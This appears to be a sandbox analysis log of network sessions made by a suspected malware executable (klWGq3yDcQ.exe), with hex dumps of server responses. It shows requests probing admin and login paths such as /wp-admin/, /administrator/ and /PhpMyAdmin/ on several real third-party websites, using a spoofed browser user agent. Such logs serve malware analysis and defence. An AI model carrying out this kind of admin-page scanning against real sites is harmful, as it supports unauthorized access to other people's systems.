                                                                                                                                                                                                    2023-11-26 05:59:38 UTC472INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC15912INData Raw: 37 39 37 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 7971<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC15190INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/">


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    217192.168.2.460622162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC179OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC662INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 70 62 69 64 3d 32 61 33 31 30 35 31 64 61 38 34 64 34 66 65 66 64 35 36 39 36 33 38 33 34 38 63 61 38 61 64 65 33 33 38 65 34 39 33 62 34 39 63 62 30 63 62 61 64 33 66 37 61 65 35 66 36 35 34 37 61 33
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: pbid=2a31051da84d4fefd569638348ca8ade338e493b49cb0cbad3f7ae5f6547a3
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC706INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta name='robots' content='noindex, nofollow' />
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC14994INData Raw: 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 53 74 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 44 69 72 65 63 74 20 4c 65 6e 64 65 72 73 2c 20 4c 4c 43 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63
                                                                                                                                                                                                    Data Ascii: ext":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://mydirectlender.com/#website","url":"https://mydirectlender.com/","name":"Staging for MyDirectLender.com","description":"Direct Lenders, LLC","publisher":{"@id":"https://mydirectlender.c
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 69 64 6e 69 67 68 74 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72
                                                                                                                                                                                                    Data Ascii: set--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC4177INData Raw: 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 74 79 78 2d 73 69 64 65 62 61 72 20 63 6f 6c 2d 6d 64 2d 33 20 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 73 65 61 72 63 68 2d 31 22 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 20 77 69 64 67 65 74 5f 73 65 61 72 63 68 22 3e 3c 66 6f 72 6d 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 69 64 3d 22 73 65 61 72 63 68 66 6f 72 6d 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74
                                                                                                                                                                                                    Data Ascii: </div> </div> </div> <div class="styx-sidebar col-md-3 col-12"> <div id="search-1" class="widget widget_search"><form role="search" method="get" id="searchform" class="searchform" action="htt


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    218192.168.2.460676144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC238OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://gruporegiosafety.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1483INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 47 45 54 2c 50 4f 53 54 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 20 41
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Access-Control-Allow-Methods: GET,POSTAccess-Control-Allow-Headers: Content-Type, A
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC6709INData Raw: 33 62 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45
                                                                                                                                                                                                    Data Ascii: 3b79<!DOCTYPE html><html lang="es-MX"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://gruporegiosafety.com/xmlrpc.php" /><script type="text/javascript">document.documentE
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC522INData Raw: 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72
                                                                                                                                                                                                    Data Ascii: global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--pr
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC8000INData Raw: 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e
                                                                                                                                                                                                    Data Ascii: lue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradien
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC8192INData Raw: 31 66 34 30 0d 0a 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74
                                                                                                                                                                                                    Data Ascii: 1f40--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-t
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC7822INData Raw: 68 6f 76 65 72 2c 2e 65 74 5f 62 75 74 74 6f 6e 5f 6e 6f 5f 69 63 6f 6e 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 2c 2e 65 74 5f 62 75 74 74 6f 6e 5f 6e 6f 5f 69 63 6f 6e 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 70 61 64 64 69 6e 67 3a 2e 33 65 6d 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 65 74 5f 62 75 74 74 6f 6e 5f 63 75 73 74 6f 6d 5f 69 63 6f 6e 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 61 66 74 65 72 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 65 6d 7d 2e 65 74 5f 62 75 74 74 6f 6e 5f 63 75 73 74 6f 6d 5f 69 63 6f 6e 2e 65 74 5f 62 75 74 74 6f 6e 5f 69 63 6f 6e 5f 76 69 73 69 62 6c 65 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 61 66 74 65 72 2c 2e 65 74 5f 62 75 74 74 6f 6e 5f 63 75 73 74 6f 6d 5f 69 63 6f 6e 20
                                                                                                                                                                                                    Data Ascii: hover,.et_button_no_icon .et_pb_button,.et_button_no_icon .et_pb_button:hover{padding:.3em 1em!important}.et_button_custom_icon .et_pb_button:after{line-height:1.7em}.et_button_custom_icon.et_button_icon_visible .et_pb_button:after,.et_button_custom_icon
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC8192INData Raw: 31 66 34 30 0d 0a 73 61 66 65 2d 6d 6f 64 65 2d 69 6e 64 69 63 61 74 6f 72 3a 66 6f 63 75 73 2c 2e 65 74 2d 73 61 66 65 2d 6d 6f 64 65 2d 69 6e 64 69 63 61 74 6f 72 3a 68 6f 76 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 35 70 78 20 31 30 70 78 20 72 67 62 61 28 34 31 2c 31 39 36 2c 31 36 39 2c 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 35 70 78 20 31 30 70 78 20 72 67 62 61 28 34 31 2c 31 39 36 2c 31 36 39 2c 2e 31 35 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 39 63 34 61 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 72
                                                                                                                                                                                                    Data Ascii: 1f40safe-mode-indicator:focus,.et-safe-mode-indicator:hover{-webkit-box-shadow:0 5px 10px rgba(41,196,169,.15);box-shadow:0 5px 10px rgba(41,196,169,.15);background:#29c4a9;color:#fff;font-size:14px;font-weight:600;padding:12px;line-height:16px;border-r
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC7822INData Raw: 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 25 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 4c 65 66 74 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 25 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30
                                                                                                                                                                                                    Data Ascii: rm:translateX(-10%);transform:translateX(-10%)}to{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}}@keyframes fadeLeft{0%{opacity:0;-webkit-transform:translateX(-10%);transform:translateX(-10%)}to{opacity:1;-webkit-transform:translateX(0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    219192.168.2.460818159.203.32.44436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC227OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://jamiesonmullin.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC176INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 3029Connection: closeContent-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC3029INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><meta content="IE=edge" http-equiv="X-UA-Compatible"> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport"> <meta con


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    220192.168.2.46081023.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC172OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
